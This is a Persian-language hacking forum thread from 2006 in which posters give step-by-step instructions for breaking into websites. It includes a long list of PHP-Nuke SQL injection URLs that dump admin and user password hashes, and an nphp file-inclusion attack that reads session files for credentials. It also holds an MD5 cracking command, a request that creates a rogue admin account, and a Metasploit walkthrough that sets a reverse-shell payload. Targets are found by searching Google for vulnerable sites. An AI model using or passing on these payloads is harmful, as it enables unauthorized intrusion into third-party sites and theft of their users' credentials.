و مشگل من هم بازم همون پیدا کردن باگ برای پی اچ پی ورزن 5 هست من تو گوگل هم سرچ شدم و یکسری جا و با یکسری اکسپلویت پیدا کردم ولی هیچ چی سر در نیاوردممیخاستم بدونم اول اینکه سایت فارسی در این مورد نیس؟
ایا سایتی نیس که فیلم اموزش بذاره مثله سایتهای ایرانی؟
چاکر شما شفته

pastoo
15-10-2006, 11:25
salam
به خاطر گذاشتن چنیم مقاله های پروفشیونالی تشر میکنم و منبه شخصه از شما میخام کهبازم بزارین ولی یه مشگلی هست که عزیز جوون والا من که با سواد سوم دبیرستان نفهمیدم چی میگه اگه ممکنه یا خوده شما این مقالهرو ترجمه کنید یا دوتانی که انگلیسی سرشون میشه ان مقاله رو لطفاً ترجمه کنن چون اط تریفهای جناب پستو که ظاهراً باید قاله مفیدی باشه
و مشگل من هم بازم همون پیدا کردن باگ برای پی اچ پی ورزن 5 هست من تو گوگل هم سرچ شدم و یکسری جا و با یکسری اکسپلویت پیدا کردم ولی هیچ چی سر در نیاوردممیخاستم بدونم اول اینکه سایت فارسی در این مورد نیس؟
ایا سایتی نیس که فیلم اموزش بذاره مثله سایتهای ایرانی؟
چاکر شما شفته

این روش رو وژن های قدیمی استفاده میشد ولی برای ورژن های جدید هم بهت میگم

با اين كه خيلي از اين سايت ها آپ دت كردند و ديگه اين مشكل را ندارند اما جالبه كه هنوز سايت هاي زيادي هستند كه اين مشكل بزرگ را دارند !
براي اين كار ابتدا ه يكي از سرچرها مثل گوگل ميرويد و php.nuke را سرچ ميكنيد كه به شما تعداد بسيار زيادي سايت معرفي ميكنه !
بعد از اين كار كار اصلي ما تازه شروع ميشه كه بايد اكسپلويت مورد نظر را به كار ببريم حالا چه جوري ؟ خيلي راحت بعد از اسم ساين اكسپلويت را به كار مي بريد ! اينم اكسپلويت هاي مورد نظر كه در سكوريتي فوكس منتشر شده !

http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT %201,2

http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors

http://[target]/modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION%20SELECT%201,aid,name,pwd%20FROM%20nuke_author s

http://[target]/modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors

http://[target]/modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*

http://[target]/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors

http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,username,user_password%20FROM%2 0nuke_users/*

http://[target]/modules.php?name=Downloads&d_op=modifydownloadrequest&lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,u ser_email,user_level,0,0%20FROM%20nuke_users

http://[target]/modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHE RE%20user_id=5

http://[target]/modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHE RE%20user_id=5

http://[target]/modules.php?name=Downloads&d_op=viewdownloadcomments&lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20FROM %20nuke_users/*

http://[target]/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1%20UNION%20SELECT%20username,1,user_password,user_id%20FROM %20nuke_users

http://[target]/modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors

http://[target]/modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHE RE%201/*

http://[target]/modules.php?name=Sections&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors

http://[target]/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors

http://[target]/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url ,10000,name%20FROM%20nuke_authors/*

بعد از اضافه كردن 2 حالت پيش مياد :
1- سايت پيغام خطا ميده يا ميگه اين ماژويل غير فعال در اين صورت سايت اين مشكل را نداره و در نهايت بايد بي خيال اين سايت شويد !!
2- بلافاصله به شما به تعداد مديران سايت يوزر + پسوردهاي هش شده ميده !
حالا بايد چه كار كنيم تا سايت را هك كنيم ؟
از اين مرحله كارمون ساده تره فقط يك كمي بايد دقت كنيم . ما براي ورود به صورت ادمين به سايت يوزر را به دست آورديم اما پسورد ما به صورت هش شده است كه براي ورود بايد پسورد اصلي را پيدا كرد !
من خودم براي اين كه اين كار را انجام بدم از چند راه مختلف عمل ميكنم كه الان چند نمونه اونا توضيح ميدم :
1- استفاده از برنامه هاي كراكر براي به دست آوردن md5 يا همون پسورد هش شده : اين كار خيلي اسونه اما يك كم وقت گيره براي اين كار من برنامه cain را پيشنهاد ميكنم .
2-باهاش يک يوزر با دسترسی مدير بسازيم که معمولا اين روش راحت تری هم هست.
حالا برای ساختن يوزر جديد چند راه هست كه من دوتا از اون راهها را توضيح ميدم .

1- ابتدا به آدرس http://www.isecurelabs.com/outils/base64 (http://www.isecurelabs.com/outils/base64) رفته و سپس user و Encrypted Password را در اين حالت وارد کنيدuser:Encrypted Password و سپس دکمه ي Encode را بزنيد! Hash بدست آمده را در آخر اين Link وارد کنيد و وارد Admin Control Panel شويد! :
http://www.site.com/Admin.php?admi (http://www.site.com/Admin.php?admi) = Hash



مقاله 2 :


قبل از شروع ، شما بايد يكي از نرم افزار هاي زير را دانلود كنيد :
-MDCrack 1.2
-NullAdd Frontend for MDCrack
براي دانلود از اينجا : http://membres.lycos.fr/mdcrack/ (http://membres.lycos.fr/mdcrack/) اقدام كنيد .
خوب حالا درس را شروع ميكينم :
اين نوع نفوذ داراي 3 مرحله ميباشد :

1-پيدا كردن سايت آسيب پذير :
براي اين كار وارد گوگل شده و به دنبال سايتهايي كه داراي صفحه : nphpd.php? هستند بگرديد . اين صفحه از نشانه هاي اصلي استفاده سايت مورد نظر از newsphp است .

براي پيدا كردن دايركتري سايت در سرور اصلي از باگ زير استفاده ميكنيم :


كد:
http://domain.com/nphp/nphpd.php?nphp_config[LangFile]=nphpd.php




و اگر سرور آسيب پذير باشد ، ما جواب زير را از طرف سرور ميبينيم :


نقل قول:
Fatal error: Cannot redeclare nphp_session_id() (previously declared in /home/example/public_html/nphp/nfunc.php:66) in /home/example/public_html/nphp/nfunc.php on line 64




همان طور كه ميبينيد سرور مكان اصلي دايركتوري سايت را به ما داد :
/home/example/public_html/nphp/nfunc.php

2-استفاده از باگ :
حالا نوبت به استفاده از اطلاعات بالا رسيده است . شما بايد مكان دايركتري سايت را همانند زير مرتب كرده و ENTER را بزنيد :


كد:
nphpd.php?nphp_config[LangFile]=/home/example/public_html/nphp/sesdata/nphp_session.log



و بعد از آن در صورتي كه سرور آسيب پذيري را به طور كامل داشته باشد جواب زير را ميبينيم :


نقل قول:
[17:24:50 29/01/2004] [1.2.3.4] Performing garbage collection.
[17:27:30 29/01/2004] [1.2.3.4] Performing garbage collection.
[17:27:31 29/01/2004] [1.2.3.4] Logout OKAY: "2d1f863b8029128d3ce69fa464f03c65.1.2.3.4.nses"
[18:22:23 29/01/2004] [1.2.3.4] Creating session: "acbbe62f698b1e172dc133ede3856516.1.2.3.4.nses"
[19:28:27 29/01/2004] [1.2.3.4] Creating session: "dacfe5b9e73bafed025c0920097f2405.1.2.3.4.nses"
[19:31:00 29/01/2004] [1.2.3.4] Creating session: "20ea4838a978c6c9de222b63f61f51d2.1.2.3.4.nses"
[21:56:20 29/01/2004] [1.2.3.4] Creating session: "c40e2dd6a1de1c2e66a0b79113bcb2c1.1.2.3.4.nses"
[00:19:55 29/01/2004] [10.20.30.40] Creating session: "840338e914e1ec33af22ad379aad2ff8.10.20.30.40.nses"
[22:20:03 29/01/2004] [10.20.30.40] Performing garbage collection.
[18:22:23 29/01/2004] [1.2.3.4] Deleting session: "acbbe62f698b1e172dc133ede3856516.1.2.3.4.nses"
[19:28:27 29/01/2004] [1.2.3.4] Deleting session: "dacfe5b9e73bafed025c0920097f2405.1.2.3.4.nses"
[19:31:00 29/01/2004] [1.2.3.4] Deleting session: "20ea4838a978c6c9de222b63f61f51d2.1.2.3.4.nses"
[21:56:20 29/01/2004] [1.2.3.4] Deleting session: "c40e2dd6a1de1c2e66a0b79113bcb2c1.1.2.3.4.nses"
[22:20:07 29/01/2004] [10.20.30.40] Performing garbage collection.
[22:26:27 29/01/2004] [10.20.30.40] Performing garbage collection.
[22:26:32 29/01/2004] [10.20.30.40] Performing garbage collection.
[22:27:08 29/01/2004] [10.20.30.40] Performing garbage collection.
[22:27:15 29/01/2004] [10.20.30.40] Performing garbage collection.
[23:27:03 29/01/2004] [1.2.3.4] Creating session: "97d829ae8bd14d71096d62011e755294.1.2.3.4.nses"




ولي حالا از SQL هايي كه INJECT كردم ، چگونه استفاده كنيم .

3- استفاده از كدهايي SQL اي كه INJECT كرده ايم :
ابتدا يك نگاه دقيق به اطلاعات مياندازيم ، ميبينيم كه چندين كد و ... براي ما رديف شده است ، ولي كدام براي ادمين سايت است ؟
بسيار واضح است كه ادمين سايت جزو اولين ثبت نام كننده گان سايت خود است !!
به همين سادگي و ما در اينجا اين SESSION را انتخاب كرديم :
840338e914e1ec33af22ad379aad2ff8.10.20.30.40.nses
خوب براي به دست آوردن پسوورد MD5 ادمين و USERNAME او ، كدي را كه داشتيم وارد دستور زير ميكنيم و ENTER را ميزنيم :


كد:
nphpd.php?nphp_config[LangFile]=/home/example/public_html/nphp/sesdata/840338e914e1ec33af22ad379aad2ff8.10.20.30.40.nses



توجه كنيد كه ، دايركتوري و ... را همانند قبل رعايت كنيد .
و از سرور جواب ميشنويم :


نقل قول:

lastused||4176612564
uname||fakeuser
pword||e99a18c428cb38d5f260853678922e03




حال بايد پسوورد را كرك كنيم ، اين كار را با نرم افزار هاي كه در بالا دانلود كرديد انجام ميدهيد .
داريم :


كد:
mdcrack.exe -s abcdefghijklmnopqrstuvwxyz0123456789 -M MD5 e99a18c428cb38d5f260853678922e03



طبق شكل زير :



و نيز ميتوانيم از نرم افزار گرافيكي آن استفاده كنيم .

به همين جالبي و حرفه اي گري . (خدا را شكر اين نوع هك دستوراتش از SQLINJECTION در PHPNUKE بيشتر است !!)
براي اطلاعات بيشتر به سايت رسمي آن مراجعه كنيد :
http://www.nphp.net/ (http://www.nphp.net/)
و اطلاعات بيشتر در مورد باگ :
http://securitytracker.com/alerts/2003/Aug/1007584.html (http://securitytracker.com/alerts/2003/Aug/1007584.html)
----------------------------------------------------------------------------------------------------
توجه خيلي مهم :
دوستان عزيزم توجه كنيد كه آموزش اين نوع SQL INJECTION كلاس كار سايت را پايين ميآورد ، ولي براي اينكه شما بتوانيد تمرين كنيد و به اصطلاح خبره اين كار شويد ، بايد حتما با اين روش هاي دست و پنجه نرم كنيد .
در ضمن اگر توجه داشته باشيد ، اين نوع sqlinjection خيلي سخت تر از روشهايي بود كه تا به حال گفته بوديم .

pastoo
15-10-2006, 11:30
salam
به خاطر گذاشتن چنیم مقاله های پروفشیونالی تشر میکنم و منبه شخصه از شما میخام کهبازم بزارین ولی یه مشگلی هست که عزیز جوون والا من که با سواد سوم دبیرستان نفهمیدم چی میگه اگه ممکنه یا خوده شما این مقالهرو ترجمه کنید یا دوتانی که انگلیسی سرشون میشه ان مقاله رو لطفاً ترجمه کنن چون اط تریفهای جناب پستو که ظاهراً باید قاله مفیدی باشه
و مشگل من هم بازم همون پیدا کردن باگ برای پی اچ پی ورزن 5 هست من تو گوگل هم سرچ شدم و یکسری جا و با یکسری اکسپلویت پیدا کردم ولی هیچ چی سر در نیاوردممیخاستم بدونم اول اینکه سایت فارسی در این مورد نیس؟
ایا سایتی نیس که فیلم اموزش بذاره مثله سایتهای ایرانی؟
چاکر شما شفته

من به شخصه با استفاده از پورتال هايي همچون PHPNUKE , ... مخالفم ، به هر صورت اينبار هم باگي با درجه امنيتي بالادر PHPNUKE ورژن هاي 6.5 تا 7.2 كشف شد كه طريقه نفوذ از طريق اين باگها به صورت زير است :
كد:http://localhost/nuke71/index.php?user=MTo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7P C9zY3JpcHQ%2bZm9vYmFy
باگ بعدي :
نقل قول:modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox

و باگ آخر كه از همه آنها خطر ناك تر ميباشد :
نقل قول:admin.php?op=AddAuthor&add_aid=simorgh&add_name=God&add_pwd=coolpass&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjoxاين كد آخري هم با ايجاد يك كاربر ادمين با نام : simorgh و با پسوورد coolpass به راحتي ميتواند هكر را در نفوذ به سايت با موفقيت 100% مواجه كند . file:///D:/hack/hosein/simorgh%20security%20magazine%20%20%20%20-%20%20%20%20PHPNUKE%207_2_files/icon_wink.gif

طرز بر طرف كردن اين باگها :

ما از انجا كه كلمه امنيتي را با خود حمل ميكنيم !!! و ظيفه خود ميدانيم كه طرز بستن اين باگها را هم توضيح دهيم .
راه فوري براي باگ آخري از كار انداختن يوزر ادمين ميباشد و يا صفحه admin.php را حذف كنيم .
من كه تا الان هنوز هيچ پچي را براي آنها نديدم . دوستاني كه پچي را سرغ دارند حتما معرفي كنند.
براي اطلاعات بيشتر : http://www.phpnuke.org/ (http://www.phpnuke.org/)
اگر توانستم بفهمم كه چطور اين باگ ها كشف شدند حتما خبرتان ميكنم .
براي كامل تر شدن موضوع اين مقاله رو هم بخونيد
http://www.angelfire.com/un/ir/phpnuke.pdf (http://www.angelfire.com/un/ir/phpnuke.pdf)
[/URL]file:///D:/hack/hosein/simorgh%20security%20magazine%20%20%20%20-%20%20%20%20PHPNUKE%207_2_files/spacer.gif[URL="http://www.asrejavaan.com/"] (http://www.simorgh-ev.com/)
file:///D:/hack/hosein/simorgh%20security%20magazine%20%20%20%20-%20%20%20%20PHPNUKE%207_2_files/icon_minipost.gif (http://forums.simorgh-ev.com/viewtopic.php?p=106#106)تاريخ: دوشنبه Apr 19, 2004 11:42 pmfile:///D:/hack/hosein/simorgh%20security%20magazine%20%20%20%20-%20%20%20%20PHPNUKE%207_2_files/icon_quote.gif (http://forums.simorgh-ev.com/posting.php?mode=quote&p=106)file:///D:/hack/hosein/simorgh%20security%20magazine%20%20%20%20-%20%20%20%20PHPNUKE%207_2_files/icon_up.gif (http://forums.simorgh-ev.com/viewtopic.php?t=31#top)براي كامل تر شدن موضوع اين مقاله رو هم بخونيد
http://www.angelfire.com/un/ir/phpnuke.pdf (http://www.angelfire.com/un/ir/phpnuke.pdf)
اين مقاله توسط حسين عسگري (مدير سايت) در آرشيو از بين رفته نوشته شده بود كه من زندش كردم
لذت ببريد!

AliR3za
15-10-2006, 14:00
salam
جناب ستو به خاطر زحماتی که کشیدید خیلی خیلی ممنون
ولی اول از همه اینکه سایت مورد نظر من پی اچ پی ورژن 5 استفاده میکنه
دوم ورژن ان هم php nuke نیست
ولی بازم از کمک شما متشکرم و در نهایت و ظاهرا باید بیخال این سایت بشم
چاکر شما شفته

pastoo
16-10-2006, 01:20
اگر می دانید ما برای شما لیست تقریبا کاملی را برای شما تهیه کرده ایم اگر هم شما اطلاع چندانی از این ابزار ندارید ما تعریف کوتاهی را برای شما عزیزان را در زیر قرار دادیم تا با این ابزار تا حدودی اشنایی پیدا کنید سپس خودتان تشخیش دهید که ایا باید دنبال کسب اطلاعات بیشتر در این زمینه باشید یا نه.
فازرها برنامه هایی برای کشف ایرادات امنیتی برنامه ها بوسیله فرستادن اطلاعات تصادفی به برنامه ها هستند.اگر برنامه ها دارای حفره ها و ایرادات امنیتی باشد می تواند آن را به ما نشان دهد و ما را در راه رسیدن به حفره یاری کند.
از كار افتادن برنامه و یا اشتباهات برگشتی از سرورها (در این حالت برنامه های کاربردی) نشان دهنده ی کشف یک ایراد توسط این برنامه ها هستند.
فازرها Fault Injectors هم نام گرفته اند چون اساس کار آنها با فرستادن یک اشتباه و ایراد به برنامه ی کاربردی و نشان دادن عکس العمل آن است. این برنامه ها برای پیدا کردن ایرادات مربوط به
BufferOverflow.1
DoS.2
SQL Injection.3
Xss.4
Format String Bugs.5
بسیار خوب و کاربردی هستند و برای یافتن ایرادت مربوط به نشت اطلاعات و ایرادات مربوط به رمز گذاری ضعیف عمل می کنند.
برنامه های زیر از معروفترین برنامه ها برای اینکار هستند.
1.مجموعه ای از اسکریپت ها پایتون برای fuzzing:
http://lxapi.sourceforge.net/ (http://lxapi.sourceforge.net/)


2.برنامه ی Mangle از این برنامه برای پیدا کردن باگ های نه چندان مشهور IFRAME اینترنت اکسپلورر استفاده شده است
http://lcamtuf.coredump.cx/soft/mangleme.tgz (http://lcamtuf.coredump.cx/soft/mangleme.tgz)


3. برنامه ی SPIKE :مجموعه ی چندین فازر شرکت Immunity و استفاده شده برای پیدا کردن حمله DoS در سرویس RDP Kernel موجود در ویندوز اکس پی سرویس پک 2 شرکت مایکروسافت.
http://www.immunitysec.com/downloads/SPIKE2.9.tgz (http://www.immunitysec.com/downloads/SPIKE2.9.tgz)


4.برنامه ی PROTOS WAP: این برنامه جزو مجموعه فازرهای پروژه PROTOS است برایfuzzingدر WAP بکار می رود.
http://www.ee.oulu.fi/research/ouspg/protos/testing/c04/wap-wsp-request/c04-wap-r1.jar (http://www.ee.oulu.fi/research/ouspg/protos/testing/c04/wap-wsp-request/c04-wap-r1.jar)


5.برنامه ی PROTOS HTTP-reply : این برنامه یکی دیگر از فازرهای پروژه ی PROTOS است که برای حمله به پاسخگویی پروتکل HTTP طراحی شده است. از این ابزار بیشتر برای پیدا کردن ایرادات مربوط به مرورگرها بکار می رود.
http://www.ee.oulu.fi/research/ouspg/protos/testing/c05/http-reply/c05-http-reply-r1.jar (http://www.ee.oulu.fi/research/ouspg/protos/testing/c05/http-reply/c05-http-reply-r1.jar)


6.PROTOS LDAP:فازری برای LDAP ولی نسبت به بقیه فازر های این شرکت موفقیت چندانی کسب نکرده و از همه گمنام تر است.
http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/c06-ldapv3-enc-r1.jar (http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/c06-ldapv3-enc-r1.jar)


7.برنامه ی PROTOS SNMP:یک SNMP فازر قدیمی است که از سال 2002 بوجود آمده و ایرادات مختلفی را بر روی لوازم و تجهیزات مربوط به شبکه کشف کرده است.
http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/snmpv1/c06-snmpv1-req-app-r1.jar (http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/snmpv1/c06-snmpv1-req-app-r1.jar)


8.برنامه یPROTOS SIP: از این برنامه برای فازینگ بر روی تمامی تجهیزات VOIP SIP که در همه جا دیده می شود استفاده می شود.
http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/snmpv1/c06-snmpv1-req-app-r1.jar (http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/snmpv1/c06-snmpv1-req-app-r1.jar)


9.برنامه ی PROTOS ISAKMP: فازری که برای حمله به IPSec در حال اجرا طراحی شده است.
http://www.ee.oulu.fi/research/ouspg/protos/testing/c09/isakmp/c09-isakmp-r1.jar (http://www.ee.oulu.fi/research/ouspg/protos/testing/c09/isakmp/c09-isakmp-r1.jar)


10.برنامه های RIOT&faultmon:برای حمله به پروتکل های Telnet, HTTP, SMTP بکار می رود. در ضمن این ابزار توسط اقای Riley Hassell هنگامی که درشرکت امنیتی معروف eeye کار می کرد برای پیدا کردن باگ IIS .Printer overflow بکار گرفته شده است و در ضمن همین برنامه هم در کتابshellcoders handbook پوشش داده شده است.
http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip (http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip)


11.برنامه یSPIKE *****:این فازر همانند SPIKE است و عملی مشابهه آن را انجام می دهد.
http://www.immunitysec.com/downloads/SP148.zip (http://www.immunitysec.com/downloads/SP148.zip)



12.برنامه یTag Brute Forcer:
یک فازر ترس آور ساخته ی Drew Copley از شرکت امنیتی eeyeکه برای حمله به ActiveX applications سفارشی شده است.
از این ابزار برای دسته ای از باگ های زشت وزننده ی مرورگر مایکروسافتی استفاده شده است. این مرورگر همچنین دارای توانایی ویژه ای برای کشف باگ های مربوط بهheap overflows است.
http://www.eeye.com/html/resources/downloads/other/TagBruteForcer.zip (http://www.eeye.com/html/resources/downloads/other/TagBruteForcer.zip)


13.برنامه یFileFuzz: یک نوع فازر برای فایل های بایناری ویندوزی متعلق به شرکت iDefense که دارای اینترفیس گرافیکی بسیار جالبی و قشنگی است. که بتازگی اقای Jack Koziol از آن برای پیدا کردن چند باگ در برنامه ی word استفاده کرده است.
http://www.idefense.com/iia/doDownload.php?downloadID=3 (http://www.idefense.com/iia/doDownload.php?downloadID=3)


14.برنامه یSPIKEFile: فازری مختص به فایل های بایناری لینوکس و حمله به آنها در ضمن محصول شرکت iDefense است.file format fuzzer for attacking ELF (Linux) binaries
http://www.idefense.com/iia/doDownload.php?downloadID=14 (http://www.idefense.com/iia/doDownload.php?downloadID=14)


15.برنامه ی NotSPIKEFile: برای شروع بجای استفاده از SPIKE می توان از این نرم افزار استفاده کرد.
http://www.idefense.com/iia/doDownload.php?downloadID=10 (http://www.idefense.com/iia/doDownload.php?downloadID=10)


16.برنامه ی Screaming Cobra: استفاده ی بیشتر از این برنامه در زمینه پیدا کردن باگ های Cgi است.این برنامه اسکریپت کوچکی است که به آسانی تغییرپذیر و قابل توسعه است.
http://www.dachb0den.com/projects/screamingcobra/screamingCobra-1.00.tar.gz (http://www.dachb0den.com/projects/screamingcobra/screamingCobra-1.00.tar.gz)


17.برنامه ی WebFuzzer:
یک فازر برای پیدا کردن حفره ها موجود در برنامه هاي كاربردي وب است که بسیار بهتر از فازهای ارزان قیمت تجاری است.
http://gunzip.altervista.org/webfuzzer/webfuzzer-latest.tar.gz (http://gunzip.altervista.org/webfuzzer/webfuzzer-latest.tar.gz)


18.eFuzz:یک فازر هوشمند برای پروتکل Tcp/ip که برای استفاده بسیار راحت است.
http://gunzip.altervista.org/webfuzzer/webfuzzer-latest.tar.gz (http://gunzip.altervista.org/webfuzzer/webfuzzer-latest.tar.gz)


19.برنامه ی Peach Fuzzer :
بزرگ ترین فازری که تا بحال نوشته شده و توسط اقای Michael Eddington نوشته شده که در ادرس زیر می توانید ان را بیابید:
http://peachfuzz.sourceforge.net/ (http://peachfuzz.sourceforge.net/)


20.و اخرین مورد برنامه Fuzz است که توسط دکتر بارتون میلر در 1990 نوشته شده است و از ادرس زیر قابل دریافت است.
http://www.cs.wisc.edu/~bart/fuzz/fuzz.html (http://www.cs.wisc.edu/~bart/fuzz/fuzz.html)


حالا دیگر بروید شروع به کندو کاش کنید ببینید چه می یابید:)
منبع وبلاگ اقای Jack Koziol

mirvis
16-10-2006, 12:56
سلام آقای پستو لطف میکنی آموزش استفاده از اکسپلویت هایی کخ به صورت کد در سایت هایی مانند Mil0 وجود دارند برای نفوذ به سایت ها وجود دارن را بدهید
منظور من این است که این کد ها را چطور استفاده باید کرد اگر به صورت مقاله و یا فیلم آموزش آن را قارا دهید ممنون میشوم.

pastoo
17-10-2006, 21:06
سلام آقای پستو لطف میکنی آموزش استفاده از اکسپلویت هایی کخ به صورت کد در سایت هایی مانند Mil0 وجود دارند برای نفوذ به سایت ها وجود دارن را بدهید
منظور من این است که این کد ها را چطور استفاده باید کرد اگر به صورت مقاله و یا فیلم آموزش آن را قارا دهید ممنون میشوم.



شاید بیش از 10 بار در همین تایپیک من آموزش دادم و آموزش کامپایل کردن را هم به صورت مقاله و هم به صورت فیلم گذاشتم متاسفانه دوستان مطالب را فقط موضوعی مطالعه میکنن و کامل به مطالب توجه ندارن



طریقه کامپایل کردن ایکسپلوئت هایه به زبان C که در محیط Linux کامپایل میشه رو در این مقاله آموزش میدم !!! که بتونید در محیط ویندوز و با این برنامه کامپایل کنید !!! Ok !!!
خوب بسه دیگه مزش از بین میره تا نبینید نمیشه !!! میتونید از لینک زی دانلود کنید !!!
دانلود (http://www.badongo.com/file/1559638)

mirvis
19-10-2006, 21:00
شاید بیش از 10 بار در همین تایپیک من آموزش دادم و آموزش کامپایل کردن را هم به صورت مقاله و هم به صورت فیلم گذاشتم متاسفانه دوستان مطالب را فقط موضوعی مطالعه میکنن و کامل به مطالب توجه ندارن



طریقه کامپایل کردن ایکسپلوئت هایه به زبان C که در محیط Linux کامپایل میشه رو در این مقاله آموزش میدم !!! که بتونید در محیط ویندوز و با این برنامه کامپایل کنید !!! Ok !!!
خوب بسه دیگه مزش از بین میره تا نبینید نمیشه !!! میتونید از لینک زی دانلود کنید !!!
دانلود (http://www.badongo.com/file/1559638)

خیلی ممنون از شما من آموزشو دیدم اما بعد از این کار چطور به سایت نفوذ
و دیگر اگر آموزش هک کردن سرور ها ی سایت بزارید ممنون می شم ؟

واقعا ممنون از شما

pastoo
19-10-2006, 23:10
خیلی ممنون از شما من آموزشو دیدم اما بعد از این کار چطور به سایت نفوذ
و دیگر اگر آموزش هک کردن سرور ها ی سایت بزارید ممنون می شم ؟

واقعا ممنون از شما

دوست من وقتی شما باگی رو کامپایل میکنی و آن را exploit میکنی کافی است وارد cmd شده و مسیر آن فایل کامپایل شده در کامپیوتر خود را وارد کرده و آن را در cmd اجرا کن .
اگه بر این طور عمل کنی به شما آموزش استفاده از آن باگ را در اینترنت میدهد سپس طبق آموزش داده شده عمل کن و به سایتی که آن باگ را داشت نفوذ کن .

به خدا آسون ترین راه هک سایت ها و سرور ها استفاده از exploit های آن ها است که شما با استفاده از سرچی که در google میکنی پی به وجود باگ مورد نظر در سایت های مختلف میشوید

pastoo
20-10-2006, 20:40
لینک فیلم: http://www.satanic.persiangig.com/video/perl.rar (http://www.satanic.persiangig.com/video/perl.rar)
570 کیلوبایت هست
برنامه های مورد نیاز:
اکتیو پرل Active Perl
با توجه به پلت فورم که دارید اکتیو پرل رو دانلود کنید(اگر لینوکس هستید لینوکس اگر ویندوز هستید ویندوز)
از سایت زیر میتونید دانلود کنید(اول سیستم عامل تون رو مشخص کنید بد اکتیو پرل رو دانلود کنید) : http://downloads.activestate.com/ActivePerl/ (http://downloads.activestate.com/ActivePerl/)
من از این نسخه استفاده میکنم : ActivePerl-5.6.1.638-MSWin32-x86

pastoo
20-10-2006, 20:51
آموزش کامل و تخصصی سی پنل
به کلیه دوستان پیشنهاد میکنم مطالعه کنن
تا با سی پنل کامل آشنا باشن و بهترین بازدهی رو از این سیستم بگیرن
File Type: PDF
Size:650KB
Download (http://satanichell.persiangig.com/journal/Cpanel.zip)

pastoo
23-10-2006, 15:26
مقاله ای پیرامون نحوه ی استفاده از متااسپلویت فریمورک
قبل از هر چیز باید در مورد متا توضیحاتی بدم که بدونید کار اون چیه!
متااسپلویت برنامه ایی است که توانایی اکسپلویت کردن تارگت هارو با اکسپلویت های نوشته شده در قالب اون رو میده و اکسپلویت های متا با همچین چیزی شروع میشن
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
در هر اکسپلویت تارگت های اون و نحوه ی استفاده از اون هست بعنوان مثال
'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
'Version' => '$Revision: 1.9 $',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],
Veritas Backup Exec Windows Remote Agent Overflow میبینید که اسم این اکسپلویت
هست و تارگت های اون
[ 'x86' ], 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],
اما اسم اون در کنسول متا چیه؟
package Msf::Exploit::backupexec_agent;
use base "Msf::Exploit";
اکسپلویت ما اسمش اینه!
backupexec_agent
شما میتونید اکسپلویت های دیگه ایی رو انتخاب کنید
خوب حالا وارد کنسول متا اسپلویت میشیم
Start/MetaSploit Framework/MSFConsole
تایپ میکنیم msf > در مقابل
use backupexec_agent
اگه اسم رو درست زده باشید وارد اون میشه
حالا با دستور
show payloads
پیلود های مربوط به این اکسپلویت رو ببینید
win32_reveseمن این رو ترجیح میدم
چون یه شل کامل به شما میده
خوب با این دستور پیلود خودتونو انتخاب کنید
set PAYLOAD win32_reverse
اگه درست وارد کرده باشید به اینجا ختم میشید
msf backupexec_agent(win32_reverse) >
show optionsخوب با دستور
آپشن های مربوط به اکسپلویت رو ببینید
msf backupexec_agent(win32_reverse) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 10000 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC process Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Veritas BE 9.0/9.1/10.0 (All Windows)
این قسمت مربوط به اکسپلویت
Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 10000 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------
و این قسمت مربوط به پیلوده
-------- -------- ------- ------------------------------------------

